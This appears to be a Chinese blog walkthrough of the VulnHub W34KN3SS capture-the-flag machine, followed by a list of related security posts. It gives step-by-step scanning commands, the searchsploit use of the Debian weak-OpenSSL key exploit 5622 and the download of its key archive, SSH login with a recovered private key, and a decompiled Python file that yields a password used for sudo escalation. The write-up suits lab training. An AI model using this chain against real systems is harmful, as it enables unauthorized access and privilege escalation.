W34KN3SS靶机

信息收集:

复制代码
靶机地址:https://www.vulnhub.com/entry/w34kn3ss-1,270/#

(1)ip扫描

复制代码
nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:E8:66:AB'

(2)端口扫描

复制代码
nmap -p- -A 192.168.254.145

(3)目录扫描

复制代码
dirb http://192.168.254.145

(4)访问页面没啥有用的

(5)拼接目录扫描出来的目录/test,没啥用

(6)回去看到端口扫描443端口的后面有1个域名,尝试访问一下域名,发现不行

(7)我们想到将它配置到/etc/hosts文件中,现在访问就可以访问到了,这里可能是用户名先留着

(8)在对域名进行目录扫描

复制代码
dirb http://weakness.jth

(9)拼接访问private,显示出两个文件,访问一下,提供了有关OpenSSL 0.98c-1的线索 并且我们发现的公钥也是由他生成的

getshell:

(1)使用searchsploit查找他

复制代码
searchsploit 0.9.8c-1
searchsploit -m 5622
cat 5622.txt

(2)需要去下载里面给的一个github的压缩包的工具,下载完成之后放到kail中进行解压

复制代码
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

tar -xjvf 5622.tar.bz2

(3)在看之前的另一个文件,使用工具进行解码

复制代码
grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"

4161de56829de2fe64b9055711f531c1-2537.pub

(4)使用公钥和用户名登录ssh

复制代码
ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.254.145

提权:

(1)发现user.txt 进行访问

(2)当我们检查代码的文件类型时,它发现是一个 python 编译的文件。让我们将其复制到 /var/www/html,这样我们就可以在我们的系统上下载此文件。

复制代码
file code 
cp code /var/www/html

(3)我们已经在我们的系统上下载了该文件。使用uncompyle2 或者 GitHub - rocky/python-uncompyle6: A cross-version Python bytecode decompiler 对Python代码进行反编译

复制代码
直接下载到kali也行 
wget http://192.168.254.146/code  

(4)得到密码,sudo su 提权成功

复制代码
Username: n30
Password: dMASDNB!!#B!#!#33
相关推荐
unable code17 分钟前
攻防世界-Misc-4-1
网络安全·ctf·misc·1024程序员节
金灰3 小时前
一带一路(金砖)--网络安全防护治理赛项
网络·计算机网络·安全·web安全·网络安全·网络攻击模型·安全威胁分析
Bruce_Liuxiaowei3 小时前
网站敏感文件_目录大全(分类记忆+风险标注)
运维·网络·网络协议·http·网络安全·https
脆皮瞎3 小时前
内网域渗透-信息收集
网络·网络安全
独角鲸网络安全实验室3 小时前
高危预警!React核心组件曝CVSS 9.8漏洞,数百万开发者面临远程代码执行风险
运维·前端·react.js·网络安全·企业安全·漏洞·cve-2025-11953
独角鲸网络安全实验室3 小时前
高危预警!React CVE-2025-55182 突破 RSC 防护,未授权 RCE 威胁 39% 云应用
前端·react.js·网络安全·前端框架·漏洞·rce·cve-2025-55182
玥轩_5214 小时前
静态路由原理 及实验案例
网络·网络协议·网络安全·智能路由器·路由器·交换机
bleach-4 小时前
应急响应之入侵检测排查——Windows篇—,Windows日志介绍分析
windows·安全·web安全·网络安全·系统安全
重生之我在番茄自学网安拯救世界5 小时前
网络安全中级阶段学习笔记(九):upload靶场实战(14-16关)-图片马制作与通过教学
笔记·学习·网络安全·文件上传漏洞·图片木马
旺仔Sec6 小时前
2025年安徽省职业院校技能大赛(高职组)信息安全管理与评估竞赛任务书
web安全·网络安全